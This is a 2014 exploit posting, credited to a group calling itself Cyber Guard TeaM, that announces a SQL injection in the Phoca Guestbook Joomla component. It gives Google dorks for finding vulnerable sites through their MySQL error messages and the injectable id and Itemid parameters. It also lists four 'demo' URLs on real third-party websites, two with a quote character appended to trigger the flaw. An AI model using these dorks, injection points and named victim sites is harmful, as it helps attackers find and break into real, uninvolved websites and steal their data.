facebook facebook twitter rss

Phoca Guestbook SQL injection vulnerability

Author: Cyber Guard TeaM , Published: 14-06-2014
##############################################################

# Exploit Title : Powered by Phoca Guestbook SQL injection vulnerability
#
# Exploit Author : Cyber Guard TeaM
#
# Discovered By : Injector
#
# Home : Cyber-guard.org
#
# Dork 1: Powered by Phoca Guestbook inurl:"id=" & intext:"Warning: mysql_query()
#
# Dork 2: Powered by Phoca Guestbook inurl:"index.php?option=com_phocaguestbook" & intext:"Warning: mysql_query()
#
# Date: 14/6/2014
#
# Tested on: Kali, Win7
#
# Vendor's Website: http://www.phoca.cz/
#
##############################################################

VULNERABILITY

##############

[~] VULNERABILITY}~~


[~] http://www.site.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=[SQL INJECTION]

[~] http://www.site.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=[SQL INJECTION]

##############

demo 1: http://www.wgm-wanderverein.de/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=4

demo 2: http://hallenturniere.tvsteinheim-fussball.de/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=13

demo 3: http://www.delle-rose.eu/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1'

demo 4: http://www.istudyabroadmorocco.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1'


##############################################################

Special Thanks of : ICA, StorM and all members

##############################################################

Like us on Facebook :